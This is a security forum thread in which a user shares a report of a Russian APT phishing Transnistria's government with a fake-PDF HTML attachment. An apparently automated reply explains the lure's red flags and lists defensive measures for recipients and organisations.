Russian APT actor phishes the Baltics and the Balkans

[Khushal]

Content source

https://strikeready.com/blog/russian-apt-actor-phishes-the-baltics-and-the-balkans/

On December 5th, a Russian APT targeted Transnistria’s governing body with a credential phishing email attachment, spoofing the Pridnestrovian Moldavian Republic. The image below shows the email content translated.

Russian APT actor phishes the Baltics and the Balkans

A Russian APT has been targeting Spain, Lithuania, Bulgaria, and more, since at least 2023.

strikeready.com

 

[Bot]

On December 5th, a Russian APT targeted Transnistria’s governing body with a credential phishing email attachment, spoofing the Pridnestrovian Moldavian Republic. The image below shows the email content translated.

View attachment 293828

Russian APT actor phishes the Baltics and the Balkans

A Russian APT has been targeting Spain, Lithuania, Bulgaria, and more, since at least 2023.

strikeready.com

This is a classic example of a targeted, government‑themed credential‑phishing email with an .html attachment used as the lure.

What the email is trying to do
From the screenshot and the blog description:

• It impersonates the Presidential Administration of the Pridnestrovian Moldavian Republic.
• It uses an “official order” with a reference number and dates to add legitimacy.
• It pressures the recipient with a review deadline and states the order is mandatory for all units.
• The malicious content is in an HTML file attachment masquerading as a PDF (name like: Распоряжение № 441рп.pdf.html).
• Opening that .html file in a browser typically leads to a fake login page or script designed to steal credentials.

Everything here matches common APT spear‑phishing TTPs: highly relevant theme, real‑looking sender, no obvious typos, and a file name crafted to look like a normal document rather than malware.

Red flags in this specific email

• .html attachment disguised as PDF: The double extension (.pdf.html) is a strong indicator of phishing. Real internal orders are usually sent as PDF, DOCX, or via an internal document system, not HTML.
• Urgency and obligation: “implementation is mandatory for all units” + hard deadline – a classic pressure tactic.
• “Please see appendix / attachment” without context: No summary of the order or details in the body – the aim is to get you to click, not to inform.
• Potential spoofing of the sender: Even if the domain looks correct, APTs often abuse look‑alike domains, compromised accounts, or weaknesses in SPF/DKIM/DMARC.

If someone receives a similar email

• Do not open .html, .htm, or .shtml attachments claiming to be “documents” or “PDFs”.
• Verify via an independent channel: call or message the supposed sender using known contact info (not what’s in the email).
• If it’s work‑related, forward to your IT/security team or use the company’s “Report Phishing” function.
• If you already opened the attachment and entered credentials:
  • Change those passwords immediately from a clean device.
  • Enable MFA/2FA if not already on.
  • Inform your security/IT team so they can check for suspicious logins and lateral movement.

Defensive measures organizations can take

• Email security policies:
  • Block or heavily scrutinize .html attachments from external senders.
  • Use sandboxing/URL rewriting to detonate and analyze attachments/links.
• Account hardening:
  • Enforce MFA, ideally FIDO2 security keys for high‑risk users.
  • Monitor for unusual logins, especially from unusual geographies or Tor/VPN exit nodes.
• Awareness training:
  • Teach staff that “official orders” can be weaponized and that double extensions are suspicious.
  • Simulated phishing (done by IT/security) to train recognition of similar lures.

Summary
This email is a well‑crafted, state‑style spear‑phishing lure using an “official order” and a fake PDF/HTML attachment to harvest credentials. The main takeaways are: don’t trust HTML “documents,” verify through other channels, use MFA, and report such messages to your organization’s security team or, on MalwareTips, share samples/logs in the appropriate section for expert review.